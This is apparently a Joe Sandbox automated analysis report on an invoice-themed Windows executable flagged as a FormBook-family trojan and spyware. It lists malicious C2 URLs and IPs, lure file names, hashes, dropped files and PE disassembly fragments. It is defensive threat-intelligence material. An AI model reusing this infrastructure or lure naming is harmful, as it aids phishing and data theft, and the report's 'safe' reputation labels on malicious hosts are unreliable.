http://www.huiguang.xyz/hv6g/?Hx=ot9h&yX7=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q= | true | Avira URL Cloud: safe | unknown
http://www.beingandbecoming.ltd/79tr/?yX7=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&Hx=ot9h | true | Avira URL Cloud: safe | unknown
http://www.beingandbecoming.ltd/79tr/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://34.92.79.175:19817 | ktmutil.exe, 0000000B.00000002.3412669118.0000000003BE4000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3414389532.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409897296.0000000002A74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.0000000017A24000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95a | ktmutil.exe, 0000000B.00000002.3412669118.0000000003BE4000.00000004.10000000.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409897296.0000000002A74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.0000000017A24000.00000004.80000000.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.mcfunding.org | tOxaspWNamv.exe, 0000000E.00000002.3408793565.0000000000DE4000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
203.161.49.193 | www.futurevision.life | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | false
154.216.76.80 | www.huiguang.xyz | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false
3.33.130.190 | mcfunding.org | United States | 8987 | AMAZONEXPANSIONGB | true
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1562307
                                                          Start date and time:2024-11-25 13:43:17 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 9m 2s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:15
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:ORIGINAL INVOICE COAU7230734290.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@9/3@6/3
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 95%
                                                          • Number of executed functions: 52
                                                          • Number of non-executed functions: 293
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target tOxaspWNamv.exe, PID 4608 because it is empty
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • VT rate limit hit for: ORIGINAL INVOICE COAU7230734290.exe
Time | Type | Description
07:45:23 | API Interceptor | 1383084x Sleep call for process: ktmutil.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 203.161.49.193
  Payroll List.exe | malicious | FormBook | www.futurevision.life/hxmz/
  MV KODCO.exe | malicious | FormBook | www.futurevision.life/hxmz/?jD=VzTtTZ&1H=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws=
  PO 20495088.exe | malicious | FormBook | www.inspires.website/tv3i/
  Arrival Notice_pdf.exe | malicious | FormBook | www.futurevision.life/hxmz/
  PROFORMA INVOICE.exe | malicious | FormBook | www.futurevision.life/hxmz/
  Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | FormBook | www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM
  Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe | malicious | FormBook, GuLoader | www.eco-tops.website/n54u/
  Shipping documents..exe | malicious | FormBook | www.futurevision.life/hxmz/
  DHL_IMPORT_8236820594.exe | malicious | FormBook | www.harmonid.life/aq3t/
  DHL_IMPORT_8236820594.exe | malicious | FormBook | www.harmonid.life/aq3t/
Match: 154.216.76.80
  Payroll List.exe | malicious | FormBook |
Match: 3.33.130.190
  santi.exe | malicious | FormBook | www.espiritismo.info/4knb/
  TAX INVOICE.exe | malicious | FormBook | www.platinumkitchens.info/x3qa/
  Purchase Order PO.exe | malicious | FormBook | www.goldstarfootwear.shop/8m07/
  Payroll List.exe | malicious | FormBook | www.mcfunding.org/0598/
  NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbe | malicious | FormBook | www.qwibie.net/83g2/
  HXpVpoC9cr.exe | malicious | FormBook | www.micrhyms.info/y7on/
  MV KODCO.exe | malicious | FormBook | www.mcfunding.org/0598/?1H=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&jD=VzTtTZ
  Order No 24.exe | malicious | FormBook | www.marketprediction.app/ucmb/
  PO 20495088.exe | malicious | FormBook | www.livelovechat.live/pd34/
  Arrival Notice.exe | malicious | FormBook | www.theproselytizer.net/zyfi/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: www.huiguang.xyz
  Payroll List.exe | malicious | FormBook | 154.216.76.80
  MV KODCO.exe | malicious | FormBook | 154.92.61.37
  Arrival Notice_pdf.exe | malicious | FormBook | 154.92.61.37
  PROFORMA INVOICE.exe | malicious | FormBook | 154.92.61.37
  rGO880-PDF.exe | malicious | FormBook | 154.92.61.37
  Shipping documents..exe | malicious | FormBook | 154.92.61.37
  SALARY OF OCT 2024.exe | malicious | FormBook | 154.92.61.37
Match: fp2e7a.wpc.phicdn.net
  Payment Advice D 0024679526 3930.exe | malicious | FormBook | 192.229.221.95
  file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 192.229.221.95
  05.Unzipped.obfhotel22-11.js | malicious | RHADAMANTHYS | 192.229.221.95
  0a0#U00a0.js | malicious | RHADAMANTHYS | 192.229.221.95
  somes.exe | malicious | RedLine | 192.229.221.95
  segura.vbs | malicious | Remcos | 192.229.221.95
  asegurar.vbs | malicious | AsyncRAT, DcRat | 192.229.221.95
  2Wr5r2e9vo.msi | malicious | Unknown | 192.229.221.95
  file.exe | malicious | Credential Flusher | 192.229.221.95
  file.exe | malicious | Unknown | 192.229.221.95
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: POWERLINE-AS-APPOWERLINEDATACENTERHK
  Payroll List.exe | malicious | FormBook | 154.216.76.80
  Certificate 11-21AIS.exe | malicious | FormBook | 154.215.72.110
  Certificate 1045-20-11.exe | malicious | FormBook | 154.215.72.110
  Certificate 719A1120-2024.exe | malicious | FormBook | 154.215.72.110
  DOC_114542366.vbe | malicious | FormBook | 156.251.17.224
  Certificate 20156-2024.exe | malicious | FormBook | 154.215.72.110
  https://trackru.top/us | malicious | Unknown | 156.244.41.195
  Certificate 11-18720.exe | malicious | FormBook | 154.215.72.110
  RvJVMsNLJI.exe | malicious | FormBook | 154.215.72.110
  MV KODCO.exe | malicious | FormBook | 154.92.61.37
Match: AMAZONEXPANSIONGB
  http://www.kalenderpedia.de | malicious | Unknown | 3.33.220.150
  https://clever-photos-686127.framer.app/ | malicious | Unknown | 52.223.52.2
  santi.exe | malicious | FormBook | 3.33.130.190
  TAX INVOICE.exe | malicious | FormBook | 3.33.130.190
  Purchase Order PO.exe | malicious | FormBook | 3.33.130.190
  setup (1).msi | malicious | AteraAgent | 52.223.39.232
  Payroll List.exe | malicious | FormBook | 3.33.130.190
  http://www.tqltrax.com | malicious | Unknown | 3.33.148.61
  https://rebrand.ly/gs02u8a | malicious | Unknown | 3.33.143.57
  https://ambir.com/ | malicious | CAPTCHA Scam ClickFix | 3.33.220.150
Match: VNPT-AS-VNVNPTCorpVN
  apep.sh4.elf | malicious | Mirai | 14.187.251.91
  apep.arm.elf | malicious | Unknown | 14.236.143.147
  PAYROLL LIST.exe | malicious | FormBook | 202.92.5.23
  CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 203.161.43.228
  CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 203.161.43.228
  mipsel.nn.elf | malicious | Mirai, Okiru | 14.249.184.119
  sparc.nn.elf | malicious | Mirai, Okiru | 123.28.58.156
  arm.nn.elf | malicious | Mirai, Okiru | 14.188.157.232
  x86_64.nn.elf | malicious | Mirai, Okiru | 113.164.17.185
  powerpc.nn.elf | malicious | Mirai, Okiru | 14.249.184.121
                                                            No context
                                                            No context
                                                            Process:C:\Windows\SysWOW64\ktmutil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1239949490932863
                                                            Encrypted:false
                                                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                            MD5:271D5F995996735B01672CF227C81C17
                                                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):288256
                                                            Entropy (8bit):7.995573050499963
                                                            Encrypted:true
                                                            SSDEEP:6144:1mjiaWTQWACLg5NWwqrN4teDuFioF3eq5pfT9s4dLpKVk1j:1HaWTpACLg5jqrNmgeiERXTFC21j
                                                            MD5:2FAEC24389EF9C0D9EB5AF58806D7569
                                                            SHA1:084CEA800148C5B86176A7F973C05B9A4502F6CA
                                                            SHA-256:DCB28B09D87A83713E25EE8A7BAA7E193F760AF6C10D212E760815A486B728D9
                                                            SHA-512:5788E5AB9C22FAB9BC0743FD58662E8891E05927B4D42A7EE3C4954BAFA84A7B69EE22898E6F90BCDB5A123B959CB349F37F6860196A9CC46012F17D8F3517D5
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.k...AXIQ..0...w.WY...BP...LM9MRCBKRWZ1TG6AXIQPLM9MRCBKRW.1TG8^.GQ.E...S..j.?3Bt7D.?;0=l.X#<,6k02zC!).(6i...mT"6&lF_]~1TG6AXI(QE..-5..+5.gQ3.,..k0+.#...~+5.@....!?..9/%.-5.BKRWZ1TGf.XI.QMM.."BKRWZ1TG.AZHZQGM9.VCBKRWZ1TG.UXIQ@LM9=VCBK.WZ!TG6CXIWPLM9MRCDKRWZ1TG61\IQRLM9MRC@K..Z1DG6QXIQP\M9]RCBKRWJ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM.97;6KRW.cPG6QXIQ.HM9]RCBKRWZ1TG6AXIqPL-9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRW
                                                            Process:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):288256
                                                            Entropy (8bit):7.995573050499963
                                                            Encrypted:true
                                                            SSDEEP:6144:1mjiaWTQWACLg5NWwqrN4teDuFioF3eq5pfT9s4dLpKVk1j:1HaWTpACLg5jqrNmgeiERXTFC21j
                                                            MD5:2FAEC24389EF9C0D9EB5AF58806D7569
                                                            SHA1:084CEA800148C5B86176A7F973C05B9A4502F6CA
                                                            SHA-256:DCB28B09D87A83713E25EE8A7BAA7E193F760AF6C10D212E760815A486B728D9
                                                            SHA-512:5788E5AB9C22FAB9BC0743FD58662E8891E05927B4D42A7EE3C4954BAFA84A7B69EE22898E6F90BCDB5A123B959CB349F37F6860196A9CC46012F17D8F3517D5
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.k...AXIQ..0...w.WY...BP...LM9MRCBKRWZ1TG6AXIQPLM9MRCBKRW.1TG8^.GQ.E...S..j.?3Bt7D.?;0=l.X#<,6k02zC!).(6i...mT"6&lF_]~1TG6AXI(QE..-5..+5.gQ3.,..k0+.#...~+5.@....!?..9/%.-5.BKRWZ1TGf.XI.QMM.."BKRWZ1TG.AZHZQGM9.VCBKRWZ1TG.UXIQ@LM9=VCBK.WZ!TG6CXIWPLM9MRCDKRWZ1TG61\IQRLM9MRC@K..Z1DG6QXIQP\M9]RCBKRWJ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM.97;6KRW.cPG6QXIQ.HM9]RCBKRWZ1TG6AXIqPL-9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRWZ1TG6AXIQPLM9MRCBKRW
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.145927637087262
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:ORIGINAL INVOICE COAU7230734290.exe
                                                            File size:1'212'928 bytes
                                                            MD5:faf30d977546a3527433829420a666c5
                                                            SHA1:5258f4d7a4422007f249a28b67320d6b9e3d978d
                                                            SHA256:2d9b62300c1248c233aa02fa4daa6d77efed6b8c617a8b33f4e9b71590941cda
                                                            SHA512:654b593d4eb99443e9292ccf2de23b9212fff72a77d5c42f8b61589b8607758165c4587889fda4e240fa3cba8cd704dd9e1f32f1f2421434dba3a29842ba4416
                                                            SSDEEP:24576:ptb20pkaCqT5TBWgNQ7ayAEEqRrcQkJmO6A:6Vg5tQ7ayAZz5
                                                            TLSH:7645DF1363DE8361C3B25273BA25B751AEBF782506B1F56B2FD4093DE920122521EB73
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                            Icon Hash:aaf3e3e3938382a0
                                                            Entrypoint:0x425f74
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x673E826D [Thu Nov 21 00:44:29 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                            Instruction
                                                            call 00007FDEE4D962CFh
                                                            jmp 00007FDEE4D892E4h
                                                            int3
                                                            int3
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [esp+10h]
                                                            mov ecx, dword ptr [esp+14h]
                                                            mov edi, dword ptr [esp+0Ch]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007FDEE4D8946Ah
                                                            cmp edi, eax
                                                            jc 00007FDEE4D897CEh
                                                            bt dword ptr [004C0158h], 01h
                                                            jnc 00007FDEE4D89469h
                                                            rep movsb
                                                            jmp 00007FDEE4D8977Ch
                                                            cmp ecx, 00000080h
                                                            jc 00007FDEE4D89634h
                                                            mov eax, edi
                                                            xor eax, esi
                                                            test eax, 0000000Fh
                                                            jne 00007FDEE4D89470h
                                                            bt dword ptr [004BA370h], 01h
                                                            jc 00007FDEE4D89940h
                                                            bt dword ptr [004C0158h], 00000000h
                                                            jnc 00007FDEE4D8960Dh
                                                            test edi, 00000003h
                                                            jne 00007FDEE4D8961Eh
                                                            test esi, 00000003h
                                                            jne 00007FDEE4D895FDh
                                                            bt edi, 02h
                                                            jnc 00007FDEE4D8946Fh
                                                            mov eax, dword ptr [esi]
                                                            sub ecx, 04h
                                                            lea esi, dword ptr [esi+04h]
                                                            mov dword ptr [edi], eax
                                                            lea edi, dword ptr [edi+04h]
                                                            bt edi, 03h
                                                            jnc 00007FDEE4D89473h
                                                            movq xmm1, qword ptr [esi]
                                                            sub ecx, 08h
                                                            lea esi, dword ptr [esi+08h]
                                                            movq qword ptr [edi], xmm1
                                                            lea edi, dword ptr [edi+08h]
                                                            test esi, 00000007h
                                                            je 00007FDEE4D894C5h
                                                            bt esi, 03h
                                                            jnc 00007FDEE4D89518h
                                                            movdqa xmm1, dqword ptr [esi+00h]
                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ASM] VS2012 UPD4 build 61030
                                                            • [RES] VS2012 UPD4 build 61030
                                                            • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5f05c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x124000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5f05c | 0x5f200 | ee4e70406a89afdc882777b73dc9bf38 | False | 0.9305883500328516 | data | 7.901175237921238 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x124000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x56361 | data | | | 1.0003284992962753
RT_GROUP_ICON | 0x122b1c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x122b94 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x122ba8 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x122bbc | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x122bd0 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x122cac | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
